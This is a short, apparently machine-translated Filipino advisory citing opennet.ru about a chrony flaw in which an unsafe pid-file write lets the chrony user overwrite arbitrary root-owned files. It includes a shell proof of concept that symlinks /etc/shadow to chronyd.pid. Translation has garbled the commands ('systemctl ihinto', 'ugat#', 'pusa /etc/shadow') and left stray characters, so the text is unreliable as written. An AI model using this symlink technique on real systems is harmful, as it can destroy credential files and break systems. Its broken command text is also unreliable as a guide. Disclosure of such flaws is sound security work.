Π
Ang kahinaan ay sanhi ng hindi ligtas na paglikha ng isang pid file, na ginawa sa isang yugto kung kailan hindi pa na-reset ng chrony ang mga pribilehiyo at tumatakbo bilang root. Sa kasong ito, ang /run/chrony na direktoryo, kung saan nakasulat ang pid file, ay nilikha na may mga karapatan 0750 sa pamamagitan ng systemd-tmpfiles o kapag ang chronyd ay inilunsad kasama ng user at grupong "chrony". Kaya, kung mayroon kang access sa user chrony, posibleng palitan ang pid file /run/chrony/chronyd.pid ng simbolikong link. Ang isang simbolikong link ay maaaring tumuro sa anumang file ng system na ma-overwrite kapag inilunsad ang chronyd.
root# systemctl ihinto ang chronyd.service
ugat# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ exit
ugat# /usr/sbin/chronyd -n
^C
# sa halip na mga nilalaman ng /etc/shadow ang chronyd process ID ay ise-save
ugat# pusa /etc/shadow
15287
Kakayahang mangyari
Problema sa SUSE at openSUSE
Pinagmulan: opennet.ru